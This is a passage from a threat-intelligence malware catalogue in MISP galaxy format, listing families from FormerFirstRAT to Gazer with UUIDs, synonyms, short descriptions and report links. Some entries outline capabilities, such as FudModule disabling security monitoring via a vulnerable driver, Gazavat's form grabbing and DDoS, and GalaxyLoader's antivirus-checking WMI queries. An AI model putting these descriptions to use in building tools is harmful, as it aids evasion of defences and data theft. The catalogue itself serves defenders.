- https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/steganoamor-campaign-ta558-mass-attacking-companies-and-public-institutions-all-around-the-world/ - webarchive
- https://www.trendmicro.com/en_us/research/21/i/formbook-adds-latest-office-365-0-day-vulnerability-cve-2021-404.html - webarchive
- https://www.peerlyst.com/posts/how-to-understand-formbook-a-new-malware-as-a-service-sudhendu? - webarchive
- https://www.fortinet.com/blog/threat-research/excel-document-delivers-multiple-malware-exploiting-cve-2017-11882-part-two - webarchive
- http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html - webarchive
- https://www.cyberbit.com/blog/endpoint-security/formbook-research-hints-large-data-theft-attack-brewing/ - webarchive
- https://www.trellix.com/en-us/about/newsroom/stories/research/cyberattacks-targeting-ukraine-increase.html - webarchive
- https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/trojanized-onenote-document-leads-to-formbook-malware/ - webarchive
- https://asec.ahnlab.com/en/32149/ - webarchive
- https://www.lac.co.jp/lacwatch/report/20220307_002893.html - webarchive
- https://www.cyberbit.com/formbook-research-hints-large-data-theft-attack-brewing/ - webarchive
- https://www.netskope.com/blog/new-formbook-campaign-delivered-through-phishing-emails - webarchive
- https://www.hornetsecurity.com/en/threat-research/vba-purging-malspam-campaigns/ - webarchive
- https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/ - webarchive
- http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ - webarchive
- http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html - webarchive
- https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/ - webarchive
- https://www.fortinet.com/blog/threat-research/deep-analysis-new-formbook-variant-delivered-phishing-campaign-part-I - webarchive
- https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko - webarchive
- https://blogs.blackberry.com/en/2021/09/threat-thursday-xloader-infostealer - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
FormerFirstRAT
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular FormerFirstRAT.
Known Synonyms |
---|
ffrat |
Internal MISP references
UUID 9aacd2c7-bcd6-4a82-8250-cab2e4e2d402
which can be used as unique global reference for FormerFirstRAT
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.former_first_rat - webarchive
- https://threatvector.cylance.com/en_us/home/breaking-down-ff-rat-malware.html - webarchive
- https://researchcenter.paloaltonetworks.com/2015/04/unit-42-identifies-new-dragonok-backdoor-malware-deployed-against-japanese-targets/ - webarchive
- https://unit42.paloaltonetworks.com/atoms/shallowtaurus/ - webarchive
- https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/space-pirates-tools-and-connections/ - webarchive
- https://decoded.avast.io/luigicamastra/operation-dragon-castling-apt-group-targeting-betting-companies - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
FortuneCrypt
Internal MISP references
UUID 02caba7c-1820-40a3-94ae-dc89b5662b3e
which can be used as unique global reference for FortuneCrypt
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
FoxSocket
Internal MISP references
UUID 61b35242-0e16-4502-a909-f4fd5e32abcb
which can be used as unique global reference for FoxSocket
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
FPSpy
Internal MISP references
UUID c3b865a8-6d2d-4ed4-a534-2db4d2e9a579
which can be used as unique global reference for FPSpy
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
FRat
A RAT employing Node.js, Sails, and Socket.IO to collect information on a target.
Internal MISP references
UUID 695f3381-302f-4fd0-b7a5-4e852291ce91
which can be used as unique global reference for FRat
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Freenki Loader
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Freenki Loader.
Known Synonyms |
---|
SHUTTERSPEED |
Internal MISP references
UUID f86b675a-b7b2-4a40-b4fd-f62fd96440f1
which can be used as unique global reference for Freenki Loader
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.freenki - webarchive
- https://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html - webarchive
- https://www.trendmicro.com/en_us/research/20/l/who-is-the-threat-actor-behind-operation-earth-kitsune-.html - webarchive
- http://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html - webarchive
- https://researchcenter.paloaltonetworks.com/2017/10/unit42-freemilk-highly-targeted-spear-phishing-campaign/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
FriedEx
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular FriedEx.
Known Synonyms |
---|
BitPaymer |
DoppelPaymer |
IEncrypt |
Internal MISP references
UUID 58ae14a9-c4aa-490c-8404-0eb590f5650d
which can be used as unique global reference for FriedEx
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.friedex - webarchive
- https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf - webarchive
- https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf - webarchive
- https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/ - webarchive
- https://www.bleepingcomputer.com/news/security/new-evil-corp-ransomware-mimics-payloadbin-gang-to-evade-us-sanctions/ - webarchive
- https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html - webarchive
- https://www.crowdstrike.com/blog/doppelpaymer-ransomware-and-dridex-2/ - webarchive
- https://www.bleepingcomputer.com/news/security/doppelpaymer-ransomware-launches-site-to-post-victims-data/ - webarchive
- https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf - webarchive
- https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/ - webarchive
- https://www.youtube.com/watch?v=LUxOcpIRxmg - webarchive
- https://www.mcafee.com/blogs/other-blogs/mcafee-labs/csi-evidence-indicators-for-targeted-ransomware-attacks/ - webarchive
- https://www.armor.com/resources/threat-intelligence/the-evolution-of-doppel-spider-from-bitpaymer-to-grief-ransomware/ - webarchive
- https://www.crowdstrike.com/blog/hades-ransomware-successor-to-indrik-spiders-wastedlocker/ - webarchive
- https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions - webarchive
- https://www.secureworks.com/research/threat-profiles/gold-drake - webarchive
- https://assets.sentinelone.com/sentinellabs/sentinellabs_EvilCorp - webarchive
- https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf - webarchive
- https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/research/everis-bitpaymer-ransomware-attack-analysis-dridex/ - webarchive
- https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf - webarchive
- https://www.sentinelone.com/wp-content/uploads/2022/02/S1_-SentinelLabs_SanctionsBeDamned_final_02.pdf - webarchive
- https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf - webarchive
- https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf - webarchive
- https://www.crowdstrike.com/blog/big-game-hunting-the-evolution-of-indrik-spider-from-dridex-wire-fraud-to-bitpaymer-targeted-ransomware/ - webarchive
- https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/ - webarchive
- https://sites.temple.edu/care/ci-rw-attacks/ - webarchive
- https://killingthebear.jorgetesta.tech/actors/evil-corp - webarchive
- http://www.secureworks.com/research/threat-profiles/gold-drake - webarchive
- https://blog.trendmicro.com/trendlabs-security-intelligence/ursnif-emotet-dridex-and-bitpaymer-gangs-linked-by-a-similar-loader/ - webarchive
- https://blog.trendmicro.com/trendlabs-security-intelligence/account-with-admin-privileges-abused-to-install-bitpaymer-ransomware-via-psexec - webarchive
- https://nakedsecurity.sophos.com/2018/09/11/the-rise-of-targeted-ransomware/ - webarchive
- https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware - webarchive
- https://lka.polizei.nrw/presse/schlag-gegen-international-agierendes-netzwerk-von-cyber-kriminellen - webarchive
- https://www.welivesecurity.com/2018/01/26/friedex-bitpaymer-ransomware-work-dridex-authors/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Fs0ciety
Internal MISP references
UUID 1587112e-fb7f-411b-af04-0dd7484befd5
which can be used as unique global reference for Fs0ciety
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
FudModule
FudModule is a user-mode DLL that gains the ability to read and write arbitrary kernel memory via the BYOVD (bring your own vulnerable driver) technique. Its main goal is to turn off Windows system monitoring features, which it does by modifying kernel variables and removing kernel callbacks. Its actions are very likely to affect various types of security products, e.g. EDRs, firewalls, antimalware and even digital forensics tools.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular FudModule.
Known Synonyms |
---|
LIGHTSHOW |
Internal MISP references
UUID 49b53f39-3e13-48e7-a2e3-5e173af343b3
which can be used as unique global reference for FudModule
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.fudmodule - webarchive
- https://www.mandiant.com/resources/blog/lightshift-and-lightshow - webarchive
- https://www.welivesecurity.com/2022/09/30/amazon-themed-campaigns-lazarus-netherlands-belgium/ - webarchive
- https://asec.ahnlab.com/ko/40495/ - webarchive
- https://decoded.avast.io/janvojtesek/lazarus-and-the-fudmodule-rootkit-beyond-byovd-with-an-admin-to-kernel-zero-day/ - webarchive
- https://www.virusbulletin.com/uploads/pdf/conference/vb2022/papers/VB2022-Lazarus-and-BYOVD-evil-to-the-Windows-core.pdf - webarchive
- https://decoded.avast.io/luiginocamastra/from-byovd-to-a-0-day-unveiling-advanced-exploits-in-cyber-recruiting-scams/ - webarchive
- https://www.microsoft.com/en-us/security/blog/2024/08/30/north-korean-threat-actor-citrine-sleet-exploiting-chromium-zero-day/ - webarchive
- https://securityintelligence.com/posts/defensive-considerations-lazarus-fudmodule/ - webarchive
- https://asec.ahnlab.com/wp-content/uploads/2022/09/Analysis-Report-on-Lazarus-Groups-Rootkit-Attack-Using-BYOVD_Sep-22-2022.pdf - webarchive
- https://www.gendigital.com/blog/news/innovation/lazarus-fudmodule-v3 - webarchive
- https://securityintelligence.com/posts/direct-kernel-object-manipulation-attacks-etw-providers/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
win.fujinama
Fujinama is a custom VB info stealer capable of executing custom commands and custom exfiltration, keylogging and taking screenshots. It was involved in the compromise of Leonardo SpA, a major Italian aerospace and defense company.
Internal MISP references
UUID efd4ec64-ad22-424b-9b7a-d9060cc29d3b
which can be used as unique global reference for win.fujinama
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
FunnySwitch
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular FunnySwitch.
Known Synonyms |
---|
RouterGod |
Internal MISP references
UUID 58eb97d1-0c29-4596-bd4a-4590b28d988f
which can be used as unique global reference for FunnySwitch
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.funnyswitch - webarchive
- https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/#id5-2 - webarchive
- https://i.blackhat.com/Asia-22/Thursday-Materials/AS-22-LeonSilvia-NextGenPlugXShadowPad.pdf - webarchive
- https://speakerdeck.com/aragorntseng/winnti-is-coming-evolution-after-prosecution-at-hitcon2021 - webarchive
- https://go.recordedfuture.com/hubfs/reports/cta-2023-0808.pdf - webarchive
- https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/ - webarchive
- https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
FunnyDream
Internal MISP references
UUID 46417b64-928a-43cd-91a6-ecee4c6cd4a7
which can be used as unique global reference for FunnyDream
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.funny_dream - webarchive
- https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf - webarchive
- https://insight-jp.nttsecurity.com/post/102glv5/pandas-new-arsenal-part-3-smanager - webarchive
- https://nao-sec.org/2021/01/royal-road-redive.html - webarchive
- https://www.bitdefender.com/files/News/CaseStudies/study/379/Bitdefender-Whitepaper-Chinese-APT.pdf - webarchive
- https://go.recordedfuture.com/hubfs/reports/cta-2021-1208.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Furtim
Internal MISP references
UUID c9d78931-318c-4b34-af33-c90f6612a4f1
which can be used as unique global reference for Furtim
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
FusionDrive
Internal MISP references
UUID 5de632a3-bf82-4cef-90fa-e7199fdb932c
which can be used as unique global reference for FusionDrive
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
FuwuqiDrama
FuwuqiDrama is a server-side RAT. It manages client connections by utilizing I/O completion ports, which are usually used in high-performance server applications as an elegant solution to manage many clients at once.
It contains two distinguishing hardcoded lists.
First is a list of ~50 video files of South Korean TV series, having their titles translated to Mandarin Chinese, but encoded in the form of Pinyin romanization. That means the sounds are spelled in Latin alphabet without tone marks, for example meiyounihuobuxiaqu.avi represents Can't Live Without You (a K-drama from 2012) or wulalafufu.avi translates to Ohlala Couple (also from 2012).
Second is the list of the following corporations: NVIDIA, Amazon, Intel, Skype, 360Safe, Rising, Tencent, Mozilla, Adobe, Yahoo, Google. The same list is contained in some of the WannaCryptor samples.
FuwuqiDrama stores its configuration in the INI file data\package_con_x86.cat. It contains the port number and a bot identifier, all within a single section called Fuwuqi – the romanized Chinese word for server.
Internal MISP references
UUID 9284445c-96a8-445d-8e9d-93a093ffbe63
which can be used as unique global reference for FuwuqiDrama
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
FuxSocy
FuxSocy has some similarities to win.cerber but is tracked as its own family for now.
Internal MISP references
UUID 289b4ffd-d406-44b1-99d4-3406dfd24adb
which can be used as unique global reference for FuxSocy
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
GaboonGrabber
According to ANY.RUN, GaboonGrabber is malware developed in .NET that unpacks its embedded resources to prepare multiple fileless stages. Additionally, it tends to camouflage itself as a legitimate application, going so far as to mimic legitimate applications in its decompiled code. It also includes a steganographic image used to prepare further payloads.
GaboonGrabber's final stage can deploy various types of malware, including Snake Keylogger, AgentTesla, Redline, Lokibot, and more.
Internal MISP references
UUID 455e4248-ba91-4bc9-8459-7d9c54d5dda6
which can be used as unique global reference for GaboonGrabber
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.gaboongrabber - webarchive
- https://app.any.run/tasks/65855217-7209-4eae-a572-b030a2305b22/ - webarchive
- https://www.ciphertechsolutions.com/roboski-global-recovery-automation/ - webarchive
- https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Gacrux
Internal MISP references
UUID 551140ca-001b-49d8-aa06-82a5aebb02dd
which can be used as unique global reference for Gacrux
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
GalaxyLoader
GalaxyLoader is a simple .NET loader. Its name stems from the .pdb and the function naming.
It seems to make use of iplogger.com for tracking. It employed WMI to check the system with the following queries:
- IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
- IWbemServices::ExecQuery - select * from Win32_VideoController
- IWbemServices::ExecQuery - SELECT * FROM AntivirusProduct
Internal MISP references
UUID c12f1363-2bc8-4ffb-8f31-cbb5f85e0ffe
which can be used as unique global reference for GalaxyLoader
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
gamapos
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular gamapos.
Known Synonyms |
---|
pios |
Internal MISP references
UUID 8f785ee5-1663-4972-9a64-f02e7c46ba66
which can be used as unique global reference for gamapos
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Gameover DGA
Internal MISP references
UUID c4afb7c6-cfba-40d7-aa79-a2829828ed92
which can be used as unique global reference for Gameover DGA
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Gameover P2P
Gameover ZeuS is a peer-to-peer botnet based on components from the earlier ZeuS trojan. According to a report by Symantec, Gameover Zeus has largely been used for banking fraud and distribution of the CryptoLocker ransomware. In early June 2014, the U.S. Department of Justice announced that an international inter-agency collaboration named Operation Tovar had succeeded in temporarily cutting communication between Gameover ZeuS and its command and control servers.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Gameover P2P.
Known Synonyms |
---|
GOZ |
Gameover ZeuS |
Mapp |
ZeuS P2P |
Internal MISP references
UUID ffc8c386-e9d6-4889-afdf-ebf37621bc4f
which can be used as unique global reference for Gameover P2P
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.gameover_p2p - webarchive
- https://www.lawfareblog.com/what-point-these-nation-state-indictments - webarchive
- https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf - webarchive
- https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf - webarchive
- https://www.wired.com/?p=2171700 - webarchive
- https://go.recordedfuture.com/hubfs/reports/cta-2021-0909.pdf - webarchive
- https://www.blackhat.com/docs/us-15/materials/us-15-Peterson-GameOver-Zeus-Badguys-And-Backends.pdf - webarchive
- https://www.cert.pl/wp-content/uploads/2015/12/2013-06-p2p-rap_en.pdf - webarchive
- https://bin.re/blog/three-variants-of-murofets-dga/ - webarchive
- https://www.secureworks.com/research/evolution-of-the-gold-evergreen-threat-group - webarchive
- https://www.intel471.com/blog/cybercrime-russia-china-iran-nation-state - webarchive
- https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf - webarchive
- https://nbviewer.org/github/tildedennis/zeusmuseum/blob/master/jupyter_notebooks/gameover/2014-05-28/Gameover%20version%202014-05-28.ipynb - webarchive
- https://web.archive.org/web/20141016080249/http://www.symantec.com/connect/blogs/security-vendors-take-action-against-hidden-lynx-malware - webarchive
- https://www.justice.gov/opa/pr/us-leads-multi-national-action-against-gameover-zeus-botnet-and-cryptolocker-ransomware - webarchive
- https://www.wired.com/2017/03/russian-hacker-spy-botnet/ - webarchive
- http://www.syssec-project.eu/m/page-media/3/zeus_malware13.pdf - webarchive
- https://krebsonsecurity.com/2019/12/inside-evil-corp-a-100m-cybercrime-menace/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
GamePlayerFramework
Internal MISP references
UUID 3efdc56a-793c-4fbb-99ea-a4d53899713a
which can be used as unique global reference for GamePlayerFramework
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Gamotrol
Internal MISP references
UUID 9664712b-81f1-4c52-ad4d-a657a120fded
which can be used as unique global reference for Gamotrol
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Gandcrab
GandCrab was a Ransomware-as-a-Service (RaaS) that emerged on January 28, 2018, managed by a criminal organization known to be confident and vocal while running a rapidly evolving ransomware campaign. Through their aggressive, albeit unusual, marketing strategies and constant recruitment of affiliates, they were able to globally distribute a high volume of their malware.
In a surprising announcement on May 31, 2019, GandCrab's operators posted on a dark web forum announcing the end of a little more than a year of ransomware operations, citing staggering profit figures. However, if there is one thing that sets these threat actors apart from other groups, it is that they are unpredictable, so there is always the possibility that they might resurface in one form or another.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Gandcrab.
Known Synonyms |
---|
GrandCrab |
Internal MISP references
UUID a8d83baa-cf2e-4329-92d7-06c8ccdeb275
which can be used as unique global reference for Gandcrab
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.gandcrab - webarchive
- https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/ - webarchive
- https://www.virusbulletin.com/virusbulletin/2020/01/behind-scenes-gandcrabs-operation/ - webarchive
- https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf - webarchive
- https://www.advanced-intel.com/post/the-dark-web-of-intrigue-how-revil-used-the-underground-ecosystem-to-form-an-extortion-cartel - webarchive
- https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf - webarchive
- https://labs.bitdefender.com/2018/02/gandcrab-ransomware-decryption-tool-available-for-free/ - webarchive
- https://labs.bitdefender.com/2019/02/new-gandcrab-v5-1-decryptor-available-now/ - webarchive
- https://gallery.mailchimp.com/c35aef82661dad887b8162a4f/files/e24e8206-a157-4796-a8cb-2b7262cc76e8/CSIS_Threat_Matrix_H1_2019.pdf - webarchive
- https://web.archive.org/web/20190331091056/https://myonlinesecurity.co.uk/fake-cdc-flu-pandemic-warning-delivers-gandcrab-5-2-ransomware/ - webarchive
- https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/ - webarchive
- https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf - webarchive
- https://www.youtube.com/watch?v=LUxOcpIRxmg - webarchive
- https://blog.talosintelligence.com/2018/05/gandcrab-compromised-sites.html - webarchive
- https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf - webarchive
- https://isc.sans.edu/diary/23417 - webarchive
- https://vimeo.com/449849549 - webarchive
- https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-ransomware-threat-report-2021.pdf - webarchive
- https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/ - webarchive
- https://www.secureworks.com/research/threat-profiles/gold-garden - webarchive
- https://blog.malwarebytes.com/threat-analysis/2019/01/vidar-gandcrab-stealer-and-ransomware-combo-observed-in-the-wild/ - webarchive
- https://teamt5.org/en/posts/introducing-the-most-profitable-ransomware-revil/ - webarchive
- https://news.sophos.com/en-us/2019/05/24/gandcrab-spreading-via-directed-attacks-against-mysql-servers/ - webarchive
- https://www.crowdstrike.com/blog/pinchy-spider-adopts-big-game-hunting/ - webarchive
- https://www.europol.europa.eu/newsroom/news/pay-no-more-universal-gandcrab-decryption-tool-released-for-free-no-more-ransom - webarchive
- https://asec.ahnlab.com/en/41450/ - webarchive
- https://blog.malwarebytes.com/threat-analysis/2018/01/gandcrab-ransomware-distributed-by-rig-and-grandsoft-exploit-kits/ - webarchive
- https://www.bleepingcomputer.com/news/security/gandcrab-operators-use-vidar-infostealer-as-a-forerunner/ - webarchive
- https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf - webarchive
- https://blog.intel471.com/2020/03/31/revil-ransomware-as-a-service-an-analysis-of-a-ransomware-affiliate-operation/ - webarchive
- https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1 - webarchive
- https://www.bleepingcomputer.com/news/security/gandcrab-ransomware-distributed-by-exploit-kits-appends-gdcb-extension/ - webarchive
- https://news.sophos.com/en-us/2019/03/05/gandcrab-101-all-about-the-most-widely-distributed-ransomware-of-the-moment/ - webarchive
- https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf - webarchive
- https://krebsonsecurity.com/2019/07/whos-behind-the-gandcrab-ransomware/ - webarchive
- https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-as-a-service-enabler-of-widespread-attacks - webarchive
- https://hotforsecurity.bitdefender.com/blog/belarus-authorities-arrest-gandcrab-ransomware-operator-23860.html - webarchive
- https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf - webarchive
- http://asec.ahnlab.com/1145 - webarchive
- https://enterprise.verizon.com/resources/reports/2019-data-breach-investigations-report.pdf - webarchive
- https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/ - webarchive
- https://www.advanced-intel.com/post/inside-revil-extortionist-machine-predictive-insights - webarchive
- https://www.bleepingcomputer.com/news/security/gandcrab-ransomware-operator-arrested-in-belarus/ - webarchive
- https://unit42.paloaltonetworks.com/revil-threat-actors/ - webarchive
- http://www.secureworks.com/research/threat-profiles/gold-garden - webarchive
- https://www.mandiant.com/resources/blog/fallout-exploit-kit-used-in-malvertising-campaign-to-deliver-gandcrab-ransomware - webarchive
- http://www.vmray.com/cyber-security-blog/gandcrab-ransomware-evolution-analysis/ - webarchive
- https://intel471.com/blog/a-brief-history-of-ta505 - webarchive
- https://tccontre.blogspot.com/2018/11/re-gandcrab-downloader-theres-more-to.html - webarchive
- https://sensorstechforum.com/killswitch-file-now-available-gandcrab-v4-1-2-ransomware/ - webarchive
- https://www.fortinet.com/blog/threat-research/gandcrab-threat-actors-retire.html - webarchive
- https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/mcafee-atr-analyzes-sodinokibi-aka-revil-ransomware-as-a-service-what-the-code-tells-us/ - webarchive
- https://www.trendmicro.com/en_in/research/21/k/global-operations-lead-to-arrests-of-alleged-members-of-gandcrab.html - webarchive
- https://www.bleepingcomputer.com/news/security/darkside-ransomware-made-90-million-in-just-nine-months/ - webarchive
- https://www.virusbulletin.com/virusbulletin/2019/11/vb2019-paper-different-ways-cook-crab-gandcrab-ransomware-service-raas-analysed-indepth/ - webarchive
- https://www.bleepingcomputer.com/news/security/gandcrab-ransomware-shutting-down-after-claiming-to-earn-25-billion/ - webarchive
- https://www.bleepingcomputer.com/news/security/gandcrab-ransomware-being-distributed-via-malspam-disguised-as-receipts/ - webarchive
- https://www.scmagazine.com/home/security-news/ransomware/gandcrab-ransomware-operators-put-in-retirement-papers/ - webarchive
- https://labs.bitdefender.com/2019/06/good-riddance-gandcrab-were-still-fixing-the-mess-you-left-behind - webarchive
- https://www.crowdstrike.com/blog/the-evolution-of-revil-ransomware-and-pinchy-spider/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Gasket
A backdoor used by Mespinoza ransomware gang to maintain access to a compromised network.
Internal MISP references
UUID 7ed854ba-c280-4d5b-9b84-c61dddd43f66
which can be used as unique global reference for Gasket
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Gaudox
Gaudox is an HTTP loader written in C/C++. The author claims to have put much effort into making this bot efficient and stable. Its rootkit functionality hides it inside Windows Explorer (32-bit only).
Internal MISP references
UUID 591b2882-65ba-4629-9008-51ed3467510a
which can be used as unique global reference for Gaudox
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Gauss
Internal MISP references
UUID 5f8be453-8f73-47a2-9c9f-e8b9b02f5691
which can be used as unique global reference for Gauss
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.gauss - webarchive
- http://contagiodump.blogspot.com/2012/08/gauss-samples-nation-state-cyber.html - webarchive
- https://www.welivesecurity.com/wp-content/uploads/2021/12/eset_jumping_the_air_gap_wp.pdf - webarchive
- https://web.archive.org/web/20230416140914if_/http://www.chinaview.cn/20230411/4e0fa0f4fd1d408aaddeef8be63a4757/202304114e0fa0f4fd1d408aaddeef8be63a4757_20230411161526_0531.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Gazavat
Gazavat (which is often tagged as Expiro by AV vendors) is a multi-functional backdoor that has code overlaps with the POS malware DMSniff. Functionality includes:
- Loading other executables
- Load hash cracking plugin
- Load DMSniff plugin
- Perform webinjection and webfakes
- Form grabbing
- Command execution
- Download file from infected system
- Convert infection into proxy
- DDOS
- Spreading and EXE infecting
Internal MISP references
UUID ac74e25e-6c73-416d-990f-2bcf0f19df2d
which can be used as unique global reference for Gazavat
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Gazer
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Gazer.
Known Synonyms |
---|
WhiteBear |
Internal MISP references
UUID 0a3047b3-6a38-48ff-8f9c-49a5c28e3ada
which can be used as unique global reference for Gazer
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.gazer - webarchive
- https://download.bitdefender.com/resources/files/News/CaseStudies/study/115/Bitdefender-Whitepaper-PAC-A4-en-EN1.pdf - webarchive
- https://securelist.com/shedding-skin-turlas-fresh-faces/88069/ - webarchive
- https://www.welivesecurity.com/2020/12/02/turla-crutch-keeping-back-door-open/ - webarchive
- https://www.youtube.com/watch?v=Pvzhtjl86wc - webarchive
